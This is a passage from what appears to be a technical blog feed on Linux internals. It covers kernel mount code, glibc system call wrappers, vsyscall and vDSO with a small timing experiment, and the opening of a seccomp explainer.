lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>It then calls ‘mount_fs’, which invokes the ‘mount’ callback registered by the file system type. The ‘mount’ callback reads the device’s super_block and returns the ‘dentry’ of the ‘super_block’. ‘vfs_kern_mount’ then initializes the struct ‘mount’.</p>
<p>After ‘vfs_kern_mount’ finishes, ‘do_new_mount’ calls ‘do_add_mount’, which adds this new mount to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_add_mount(struct mount *newmnt, struct path *path, int mnt_flags)
{
struct mountpoint *mp;
struct mount *parent;
int err;
mnt_flags &= ~MNT_INTERNAL_FLAGS;
mp = lock_mount(path);
if (IS_ERR(mp))
return PTR_ERR(mp);
parent = real_mount(path->mnt);
err = -EINVAL;
if (unlikely(!check_mnt(parent))) {
/* that's acceptable only for automounts done in private ns */
if (!(mnt_flags & MNT_SHRINKABLE))
goto unlock;
/* ... and for those we'd better have mountpoint still alive */
if (!parent->mnt_ns)
goto unlock;
}
/* Refuse the same filesystem on the same mount point */
err = -EBUSY;
if (path->mnt->mnt_sb == newmnt->mnt.mnt_sb &&
path->mnt->mnt_root == path->dentry)
goto unlock;
err = -EINVAL;
if (d_is_symlink(newmnt->mnt.mnt_root))
goto unlock;
newmnt->mnt.mnt_flags = mnt_flags;
err = graft_tree(newmnt, parent, mp);
unlock:
unlock_mount(mp);
return err;
}
</code></pre></div></div>
<p>Notice here that ‘newmnt’ is the newly created mount representing the new device,
and ‘path’ is the directory that the device will be attached to. This function does some checks (for example, the same file system can’t be attached to the same directory twice) and then calls ‘graft_tree’. ‘graft_tree’ calls ‘attach_recursive_mnt’ to add this new mount to the system.</p>
<p>The most important step is to set up the relation between the new vfsmount and its parent vfsmount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mnt_set_mountpoint(dest_mnt, dest_mp, source_mnt);
commit_tree(source_mnt);
</code></pre></div></div>
glibc system call wrapper2019-02-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/17/glibc-syscall-wrapper
<h3> Introduction </h3>
<p>glibc uses two methods to wrap system calls: one uses the make-syscalls.sh script to generate wrappers, and the other uses a C function plus some macros.</p>
<p>After we configure and build the glibc source code, we can find a ‘sysd-syscalls’ file in the ‘~/glibc-2.27/build’ directory. In that file, a system call generated by the script has the following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=dup NUMBER=32 ARGS=i:i SOURCE=-
ifeq (,$(filter dup,$(unix-syscalls)))
unix-syscalls += dup
$(foreach p,$(sysd-rules-targets),$(foreach o,$(object-suffixes),$(objpfx)$(patsubst %,$p,dup)$o)): \
$(..)sysdeps/unix/make-syscalls.sh
$(make-target-directory)
(echo '#define SYSCALL_NAME dup'; \
echo '#define SYSCALL_NARGS 1'; \
echo '#define SYSCALL_SYMBOL __dup'; \
echo '#define SYSCALL_NOERRNO 0'; \
echo '#define SYSCALL_ERRVAL 0'; \
echo '#include <syscall-template.S>'; \
echo 'weak_alias (__dup, dup)'; \
echo 'hidden_weak (dup)'; \
) | $(compile-syscall) $(foreach p,$(patsubst %dup,%,$(basename $(@F))),$($(p)CPPFLAGS))
endif
</code></pre></div></div>
<p>A system call generated from a C file has the following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=open NUMBER=2 ARGS=Ci:siv SOURCE=sysdeps/unix/sysv/linux/open.c
#### CALL=profil NUMBER=- ARGS=i:piii SOURCE=sysdeps/unix/sysv/linux/profil.c
#### CALL=ptrace NUMBER=101 ARGS=i:iiii SOURCE=sysdeps/unix/sysv/linux/ptrace.c
#### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<h3> Script wrapper </h3>
<p>There are three kinds of files related to the script wrapper:
one ‘make-syscalls.sh’ file, one ‘syscall-template.S’ file, and some ‘syscalls.list’ files.</p>
<p>‘glibc-2.27/sysdeps/unix/make-syscalls.sh’ is a script that reads a ‘syscalls.list’ file and parses every line to generate a wrapper for each system call.</p>
<p>A ‘syscalls.list’ file has the following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # File name Caller Syscall name Args Strong name Weak names
accept - accept Ci:iBN __libc_accept accept
access - access i:si __access access
acct - acct i:S acct
adjtime - adjtime i:pp __adjtime adjtime
bind - bind i:ipi __bind bind
chdir - chdir i:s __chdir chdir
chmod - chmod i:si __chmod chmod
</code></pre></div></div>
<p>This file specifies each system call’s name, arguments, etc.</p>
<p>There are several syscalls.list files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> sysdeps/unix/syscalls.list
sysdeps/unix/sysv/linux/syscalls.list
sysdeps/unix/sysv/linux/generic/syscalls.list
sysdeps/unix/sysv/linux/x86_64/syscalls.list
</code></pre></div></div>
<p>‘syscall-template.S’ is a template file used in every script wrapper system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sysdep.h>
/* This indirection is needed so that SYMBOL gets macro-expanded. */
#define syscall_hidden_def(SYMBOL) hidden_def (SYMBOL)
#define T_PSEUDO(SYMBOL, NAME, N) PSEUDO (SYMBOL, NAME, N)
#define T_PSEUDO_NOERRNO(SYMBOL, NAME, N) PSEUDO_NOERRNO (SYMBOL, NAME, N)
#define T_PSEUDO_ERRVAL(SYMBOL, NAME, N) PSEUDO_ERRVAL (SYMBOL, NAME, N)
#define T_PSEUDO_END(SYMBOL) PSEUDO_END (SYMBOL)
#define T_PSEUDO_END_NOERRNO(SYMBOL) PSEUDO_END_NOERRNO (SYMBOL)
#define T_PSEUDO_END_ERRVAL(SYMBOL) PSEUDO_END_ERRVAL (SYMBOL)
#if SYSCALL_NOERRNO
/* This kind of system call stub never returns an error.
We return the return value register to the caller unexamined. */
T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_NOERRNO
T_PSEUDO_END_NOERRNO (SYSCALL_SYMBOL)
#elif SYSCALL_ERRVAL
/* This kind of system call stub returns the errno code as its return
value, or zero for success. We may massage the kernel's return value
to meet that ABI, but we never set errno here. */
T_PSEUDO_ERRVAL (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_ERRVAL
T_PSEUDO_END_ERRVAL (SYSCALL_SYMBOL)
#else
/* This is a "normal" system call stub: if there is an error,
it returns -1 and sets errno. */
T_PSEUDO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret
T_PSEUDO_END (SYSCALL_SYMBOL)
#endif
syscall_hidden_def (SYSCALL_SYMBOL)
</code></pre></div></div>
<p>There are three kinds of system call stubs, defined by ‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’. If ‘SYSCALL_NOERRNO’ is defined, the system call is wrapped by ‘T_PSEUDO_NOERRNO’, which means the wrapper doesn’t return an error code, for example the ‘getpid’ and ‘umask’ system calls. If ‘SYSCALL_ERRVAL’ is defined, the system call is wrapped by ‘T_PSEUDO_ERRVAL’, which means the wrapper returns the kernel error code directly. If neither ‘SYSCALL_NOERRNO’ nor ‘SYSCALL_ERRVAL’ is defined, the system call is wrapped by ‘T_PSEUDO’, which means the wrapper returns -1 on errors and copies the return value (the error) to the errno variable.</p>
<p>‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’ are in ‘sysdep.h’, which is ‘glibc-2.27/sysdeps/unix/sysv/linux/x86_64/sysdep.h’.</p>
<p>First let’s look at ‘PSEUDO_NOERRNO’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_NOERRNO
# define PSEUDO_NOERRNO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args)
# undef PSEUDO_END_NOERRNO
# define PSEUDO_END_NOERRNO(name) \
END (name)
</code></pre></div></div>
<p>Following is the definition of ‘DO_CALL’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef DO_CALL
# define DO_CALL(syscall_name, args) \
DOARGS_##args \
movl $SYS_ify (syscall_name), %eax; \
syscall;
</code></pre></div></div>
<p>‘DOARGS_##args’ expands to code that shuffles the system call arguments into place. The kernel uses the following registers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> syscall number rax
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 r10
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>However, a normal function call in userspace, including a call to a system call stub, uses the following registers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> system call number in the DO_CALL macro
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 rcx
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>So DOARGS_x has the following definitions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # define DOARGS_0 /* nothing */
# define DOARGS_1 /* nothing */
# define DOARGS_2 /* nothing */
# define DOARGS_3 /* nothing */
# define DOARGS_4 movq %rcx, %r10;
# define DOARGS_5 DOARGS_4
# define DOARGS_6 DOARGS_5
</code></pre></div></div>
<p>This means that only when the system call has >=4 arguments does the stub need to move the %rcx argument to %r10.</p>
<p>‘SYS_ify’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef SYS_ify
#define SYS_ify(syscall_name) __NR_##syscall_name
</code></pre></div></div>
<p>So the ‘DO_CALL’ macro sets up the system call’s arguments, moves the system call number into %eax, and executes the ‘syscall’ instruction.</p>
<p>The ‘ENTRY’ and ‘END’ macros used by ‘PSEUDO_NOERRNO’ are as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* Define an entry point visible from C. */
#define ENTRY(name) \
.globl C_SYMBOL_NAME(name); \
.type C_SYMBOL_NAME(name),@function; \
.align ALIGNARG(4); \
C_LABEL(name) \
cfi_startproc; \
CALL_MCOUNT
#undef END
#define END(name) \
cfi_endproc; \
ASM_SIZE_DIRECTIVE(name)
</code></pre></div></div>
<p>Nothing special, just some standard definitions.</p>
<p>So for ‘PSEUDO_NOERRNO’, the system call doesn’t return an error, and glibc doesn’t need to do anything with the return value.</p>
<p>‘PSEUDO_ERRVAL’ just returns the negated error number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_ERRVAL
# define PSEUDO_ERRVAL(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
negq %rax
# undef PSEUDO_END_ERRVAL
# define PSEUDO_END_ERRVAL(name) \
END (name)
</code></pre></div></div>
<p>‘PSEUDO’ compares the return value with -4095; if the return value is >= -4095 (0xfffffffffffff001) in an unsigned comparison, the system call returned an error from the kernel. glibc jumps to ‘SYSCALL_ERROR_LABEL’ to handle this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO
# define PSEUDO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
cmpq $-4095, %rax; \
jae SYSCALL_ERROR_LABEL
# undef PSEUDO_END
# define PSEUDO_END(name) \
SYSCALL_ERROR_HANDLER \
END (name)
</code></pre></div></div>
<p>‘SYSCALL_ERROR_LABEL’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # ifdef PIC
# define SYSCALL_ERROR_LABEL 0f
# else
# define SYSCALL_ERROR_LABEL syscall_error
# endif
</code></pre></div></div>
<p>When PIC is not defined:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define syscall_error __syscall_error
int
__attribute__ ((__regparm__ (1)))
__syscall_error (int error)
{
__set_errno (-error);
return -1;
}
</code></pre></div></div>
<p>So for ‘PSEUDO’, glibc sets errno from the kernel’s returned error and returns -1 from the wrapper function.</p>
<p>Following is the disassembled dup system call wrapper.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 00000000000e4ea0 <dup>:
e4ea0: b8 20 00 00 00 mov $0x20,%eax
e4ea5: 0f 05 syscall
e4ea7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
e4ead: 73 01 jae e4eb0 <dup+0x10>
e4eaf: c3 retq
e4eb0: 48 8b 0d b1 8f 2c 00 mov 0x2c8fb1(%rip),%rcx # 3ade68 <.got+0x108>
e4eb7: f7 d8 neg %eax
e4eb9: 64 89 01 mov %eax,%fs:(%rcx)
e4ebc: 48 83 c8 ff or $0xffffffffffffffff,%rax
e4ec0: c3 retq
e4ec1: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
e4ec8: 00 00 00
e4ecb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
</code></pre></div></div>
<h3> C file wrapper </h3>
<p>As mentioned, there is another, C-file-based wrapper, which defines the system call wrapper in a C file. For example, ‘sysd-syscalls’ has the following line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<p>Both ‘__libc_read’ and ‘__read_nocancel’ will call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL_CALL (read, fd, buf, nbytes);
#define INLINE_SYSCALL_CALL(...) \
__INLINE_SYSCALL_DISP (__INLINE_SYSCALL, __VA_ARGS__)
</code></pre></div></div>
<p>So ‘INLINE_SYSCALL_CALL’ expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)
#define __INLINE_SYSCALL_DISP(b,...) \
__SYSCALL_CONCAT (b,__INLINE_SYSCALL_NARGS(__VA_ARGS__))(__VA_ARGS__)
</code></pre></div></div>
<p>The macro __INLINE_SYSCALL_NARGS(read, fd, buf, nbytes) expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_NARGS_X (read, fd, buf, nbytes,7,6,5,4,3,2,1,0,)
</code></pre></div></div>
<p>This finally evaluates to 3.</p>
<p>So ‘__INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)’ expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL3(read, fd, buf, nbytes)
</code></pre></div></div>
<p>As:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __INLINE_SYSCALL3(name, a1, a2, a3) \
INLINE_SYSCALL (name, 3, a1, a2, a3)
</code></pre></div></div>
<p>this expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL(read, 3, fd, buf, nbytes)
</code></pre></div></div>
<p>This macro is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef INLINE_SYSCALL
# define INLINE_SYSCALL(name, nr, args...) \
({ \
unsigned long int resultvar = INTERNAL_SYSCALL (name, , nr, args); \
if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, ))) \
{ \
__set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, )); \
resultvar = (unsigned long int) -1; \
} \
(long int) resultvar; })
</code></pre></div></div>
<p>This leads to the ‘INTERNAL_SYSCALL’ macro:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef INTERNAL_SYSCALL
#define INTERNAL_SYSCALL(name, err, nr, args...) \
internal_syscall##nr (SYS_ify (name), err, args)
</code></pre></div></div>
<p>For ‘internal_syscall3’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef internal_syscall3
#define internal_syscall3(number, err, arg1, arg2, arg3) \
({ \
unsigned long int resultvar; \
TYPEFY (arg3, __arg3) = ARGIFY (arg3); \
TYPEFY (arg2, __arg2) = ARGIFY (arg2); \
TYPEFY (arg1, __arg1) = ARGIFY (arg1); \
register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \
register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \
register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \
asm volatile ( \
"syscall\n\t" \
: "=a" (resultvar) \
: "0" (number), "r" (_a1), "r" (_a2), "r" (_a3) \
: "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \
(long int) resultvar; \
})
</code></pre></div></div>
<p>So this macro finally loads the three arguments into registers, executes ‘syscall’, and returns ‘resultvar’.</p>
<p>Back in the ‘INLINE_SYSCALL’ macro: if ‘resultvar’ indicates an error, glibc assigns -resultvar to errno and returns -1 as the wrapper’s return value.</p>
vsyscall and vDSO2019-02-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/13/vsyscall-and-vdso
<h3> Introduction </h3>
<p>Though there is a very good article to introduce <a href="https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-3.html">vsyscalls and vDSO</a>. I still write this to strengthen my understanding.</p>
<p>An application in user space makes system calls into the kernel to do privileged work. A system call is an expensive operation, involving a trap into the kernel and a return. If an application makes system calls very often, there will be a noticeable performance impact. vsyscall and the vDSO were designed to speed up certain simple system calls.</p>
<h3> vsyscalls </h3>
<p>The virtual system call (vsyscall) is the first mechanism in the Linux kernel that tried to accelerate the execution of certain system calls. The idea behind vsyscall is simple: some system calls just return data to user space. If the kernel maps the implementation of these system calls and their related data into user-space pages, the application can invoke them like trivial function calls, with no context switch between user space and kernel space. The vsyscall page is documented in the kernel <a href="https://github.com/torvalds/linux/blob/16f73eb02d7e1765ccab3d2018e0bd98eb93d973/Documentation/x86/x86_64/mm.txt">memory-map documentation</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
</code></pre></div></div>
<p>We can see this in process:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ cat /proc/self/maps | grep vsyscall
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
test@ubuntu:~$
</code></pre></div></div>
<p>As we can see, this address is fixed and identical in every process. The fixed address violates ASLR, since it makes it easier for an attacker to write an exploit. So the original vsyscall was discarded. However, some very old programs still need the vsyscall page. To keep them working, the kernel did not remove the page but instead implemented a mechanism called the emulated vsyscall, which is the variant we will discuss below.</p>
<p>Mapping the vsyscall page happens during Linux kernel initialization, in the call chain start_kernel->setup_arch->map_vsyscall; the last call sets up the vsyscall page. The code of map_vsyscall is shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init map_vsyscall(void)
{
extern char __vsyscall_page;
unsigned long physaddr_vsyscall = __pa_symbol(&__vsyscall_page);
if (vsyscall_mode != NATIVE)
vsyscall_pgprot = __PAGE_KERNEL_VVAR;
if (vsyscall_mode != NONE)
__set_fixmap(VSYSCALL_PAGE, physaddr_vsyscall,
__pgprot(vsyscall_pgprot));
BUILD_BUG_ON((unsigned long)__fix_to_virt(VSYSCALL_PAGE) !=
(unsigned long)VSYSCALL_ADDR);
}
</code></pre></div></div>
<p>First it gets the physical address of the vsyscall page, __vsyscall_page; the contents of this page are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vsyscall_page:
mov $__NR_gettimeofday, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_time, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_getcpu, %rax
syscall
ret
.balign 4096, 0xcc
.size __vsyscall_page, 4096
</code></pre></div></div>
<p>The vsyscall page contains three system calls: gettimeofday, time and getcpu.</p>
<p>After we get the physical address of ‘__vsyscall_page’, we check vsyscall_mode and set the fix-mapped address for the vsyscall page with the __set_fixmap macro. If ‘vsyscall_mode’ is not native, we set ‘vsyscall_pgprot’ to ‘__PAGE_KERNEL_VVAR’, which means user space can only read this page; if it is native, user space can also execute it. Note that both protections allow user space to access the page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __PAGE_KERNEL_VSYSCALL (__PAGE_KERNEL_RX | _PAGE_USER)
#define __PAGE_KERNEL_VVAR (__PAGE_KERNEL_RO | _PAGE_USER)
</code></pre></div></div>
<p>We won’t dig into the ‘__set_fixmap’ function here; it simply establishes the mapping from the vsyscall page’s virtual address to its physical address.</p>
<p>Finally, it checks that the virtual address of the vsyscall page equals ‘VSYSCALL_ADDR’.</p>
<p>Now the vsyscall page starts at ffffffffff600000, and glibc or an application can invoke the three system calls directly through the vsyscall page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define VSYSCALL_ADDR_vgettimeofday 0xffffffffff600000
#define VSYSCALL_ADDR_vtime 0xffffffffff600400
#define VSYSCALL_ADDR_vgetcpu 0xffffffffff600800
</code></pre></div></div>
<p>In emulate mode, any access to the vsyscall page triggers a page fault and ‘emulate_vsyscall’ is called. This function derives the syscall number from the faulting address:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vsyscall_nr = addr_to_vsyscall_nr(address);
static int addr_to_vsyscall_nr(unsigned long addr)
{
int nr;
if ((addr & ~0xC00UL) != VSYSCALL_ADDR)
return -EINVAL;
nr = (addr & 0xC00UL) >> 10;
if (nr >= 3)
return -EINVAL;
return nr;
}
</code></pre></div></div>
<p>Here we can see that only these three addresses are valid. This also helps mitigate ROP chains that try to abuse the vsyscall page.</p>
<p>After the check, it calls the system call function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> switch (vsyscall_nr) {
case 0:
ret = sys_gettimeofday(
(struct timeval __user *)regs->di,
(struct timezone __user *)regs->si);
break;
case 1:
ret = sys_time((time_t __user *)regs->di);
break;
case 2:
ret = sys_getcpu((unsigned __user *)regs->di,
(unsigned __user *)regs->si,
NULL);
break;
}
</code></pre></div></div>
<p>So as we can see, the emulated vsyscall actually costs even more than making the system call directly.</p>
<h3> vDSO </h3>
<p>As mentioned, vsyscall has been discarded and replaced by the virtual dynamic shared object (vDSO). The difference is that the vDSO is mapped into each process as a shared object at a randomized address, while the vsyscall page is static and has the same address in every process. All user-space applications that dynamically link against glibc use the vDSO automatically. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# ldd /bin/ls
linux-vdso.so.1 (0x00007ffed38da000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fab27f0a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fab27b19000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3
...
</code></pre></div></div>
<p>We can see that the vDSO has a different load address every time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffd2307f000-7ffd23081000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffce17c7000-7ffce17c9000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffe581ca000-7ffe581cc000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~#
</code></pre></div></div>
<p>The vDSO is initialized in the ‘init_vdso’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __init init_vdso(void)
{
init_vdso_image(&vdso_image_64);
#ifdef CONFIG_X86_X32_ABI
init_vdso_image(&vdso_image_x32);
#endif
</code></pre></div></div>
<p>‘vdso_image_64/x32’ lives in a generated source file, arch/x86/entry/vdso/vdso-image-64.c. These source files are generated by the vdso2c program from different inputs and represent the different approaches to making a system call, such as int 0x80, sysenter, etc. The full set of images depends on the kernel configuration.</p>
<p>For example for the x86_64 Linux kernel it will contain vdso_image_64:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct vdso_image vdso_image_64 = {
.data = raw_data,
.size = 8192,
.text_mapping = {
.name = "[vdso]",
.pages = pages,
},
.alt = 3673,
.alt_len = 52,
.sym_vvar_start = -12288,
.sym_vvar_page = -12288,
.sym_hpet_page = -8192,
.sym_pvclock_page = -4096,
};
</code></pre></div></div>
<p>‘vdso_image’ holds the data of a vDSO image.</p>
<p>Here raw_data contains the raw binary code of the 64-bit vDSO system calls, which occupies two pages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct page *pages[2];
</code></pre></div></div>
<p>‘init_vdso_image’ initializes part of the ‘vdso_image’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init init_vdso_image(const struct vdso_image *image)
{
int i;
int npages = (image->size) / PAGE_SIZE;
BUG_ON(image->size % PAGE_SIZE != 0);
for (i = 0; i < npages; i++)
image->text_mapping.pages[i] =
virt_to_page(image->data + i*PAGE_SIZE);
apply_alternatives((struct alt_instr *)(image->data + image->alt),
(struct alt_instr *)(image->data + image->alt +
image->alt_len));
}
</code></pre></div></div>
<p>When the kernel loads a binary into memory, it calls ‘arch_setup_additional_pages’, which in turn calls ‘map_vdso’.</p>
<p>Note that ‘map_vdso’ also needs to map a vvar region. The vDSO implements four system calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vdso_clock_gettime;
__vdso_getcpu;
__vdso_gettimeofday;
__vdso_time.
root@ubuntu:~# readelf -s vdso.so
Symbol table '.dynsym' contains 10 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000a40 619 FUNC WEAK DEFAULT 12 clock_gettime@@LINUX_2.6
2: 0000000000000cb0 352 FUNC GLOBAL DEFAULT 12 __vdso_gettimeofday@@LINUX_2.6
3: 0000000000000cb0 352 FUNC WEAK DEFAULT 12 gettimeofday@@LINUX_2.6
4: 0000000000000e10 21 FUNC GLOBAL DEFAULT 12 __vdso_time@@LINUX_2.6
5: 0000000000000e10 21 FUNC WEAK DEFAULT 12 time@@LINUX_2.6
6: 0000000000000a40 619 FUNC GLOBAL DEFAULT 12 __vdso_clock_gettime@@LINUX_2.6
7: 0000000000000000 0 OBJECT GLOBAL DEFAULT ABS LINUX_2.6
8: 0000000000000e30 41 FUNC GLOBAL DEFAULT 12 __vdso_getcpu@@LINUX_2.6
9: 0000000000000e30 41 FUNC WEAK DEFAULT 12 getcpu@@LINUX_2.6
</code></pre></div></div>
<h3> Experiment </h3>
<p>From the above we know the relative cost of the three mechanisms for triggering a system call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> emulated vsyscall > native syscall > vDSO syscall
</code></pre></div></div>
<p>I wrote a simple test program to measure the time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>      /* for strcmp */
 #include <time.h>
 #include <unistd.h>      /* for syscall */
 #include <sys/syscall.h>
 /* Address of the time() entry in the legacy vsyscall page. */
 time_t (*f)(time_t *tloc) = (time_t (*)(time_t *))0xffffffffff600400;
int main(int argc, char **argv)
{
unsigned long i = 0;
if(!strcmp(argv[1], "1")) {
for (i = 0; i < 1000000;++i)
f(NULL);
} else if (!strcmp(argv[1], "2")) {
for (i = 0; i < 1000000;++i)
time(NULL);
} else {
for (i = 0; i < 1000000; ++i)
syscall(SYS_time, NULL);
}
return 0;
}
</code></pre></div></div>
<p>Following is the result, which confirms our conclusion.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# time ./test1 1
real 0m0.539s
user 0m0.195s
sys 0m0.343s
root@ubuntu:~# time ./test1 3
real 0m0.172s
user 0m0.080s
sys 0m0.092s
root@ubuntu:~# time ./test1 2
real 0m0.002s
user 0m0.000s
sys 0m0.002s
</code></pre></div></div>
Anatomy of the seccomp2019-02-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/04/seccomp
<h3> Introduction </h3>
<p>The Linux kernel exposes a lot of system calls to userland processes, but not all of them are used by any given process. In most cases a process uses only a very limited set of system calls and leaves the rest untouched. Letting a process invoke arbitrary system calls is harmful: if a system call the process never needs in normal execution has a security bug, the process can still trigger it. Also, if a process is compromised, the attacker will usually run shellcode that issues system calls the process would never make in normal execution (such as execve). So reducing the set of system calls a process can make is useful.</p>
<p>Seccomp filtering is such a mechanism: it lets a process specify a filter for its incoming system calls. Seccomp originated from “secure computing”. At first there was only a strict seccomp mode: once a process is put into strict mode, it can only call the ‘read’, ‘write’, ‘_exit’ and ‘sigreturn’ system calls. This is inflexible and not very useful, so seccomp later gained a filter mode. A process can set the seccomp policy to filter mode and load a filter program into the kernel. The filter is a Berkeley Packet Filter (BPF) program, as with socket filters, except that the data it operates on describes the system call being made: the system call number and the system call arguments. With a BPF program loaded into the kernel, a process can express its own policy for filtering system calls, letting the kernel reject a call or send a SIGSYS signal to the process. Note that BPF programs can’t dereference pointers, so seccomp can only evaluate the system call arguments directly.</p>
<h3> Framework </h3>
